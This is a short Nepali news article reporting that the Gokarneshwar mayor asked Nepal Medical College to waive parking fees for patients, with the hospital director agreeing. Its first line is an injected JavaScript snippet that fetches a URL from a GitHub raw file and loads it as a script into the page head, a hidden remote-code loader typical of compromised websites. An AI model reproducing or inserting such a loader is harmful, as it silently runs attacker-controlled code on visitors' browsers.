;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्युज, काठमाडौँ |
नेपाल मेडिकल कलेजमा बिरामी र सेवाग्राहीलाइ लिई रहेको पार्किंग शुल्क नलिन गोकर्णेश्वर नगरपालिकाका मेयर दिपक रिसालले पत्र पठाएका छन् |
नेपाल मेडिकल कलेजमा स्वास्थ्य सेवा लिन आउने सेवाग्राहीहरुलाई अस्पताल परिसर भित्र सवारीसाधन पार्किङ्ग गर्दा पार्किङ्ग शुल्क लिइएकोमा गोकर्णेश्वर नगरवासी एवं आम सेवाग्राहीहरुले ब्यापक गुनासो ब्यक्त गरेको हुनाले अस्पताल जस्तो सम्बेदनशील क्षेत्रमा पार्कङ्गलाई शुल्क रहित बनाई अस्पतालको सेवा सुलभ गर्न तत्काल निःशुल्क पार्किङ्गको ब्यबस्था मिलाइदिन भनि पत्र पठाईएको हो |
अस्पतालका प्रबन्ध निर्देशक प्रो.डा. जैनुद्दिन अन्सारीले पनि सो पार्किंग शुल्क नलिने सम्बन्धि सकारात्मक भनाइ दिएका छन् |
नगरपालिकाको पत्र
फेसबुक प्रतिक्रियाहरु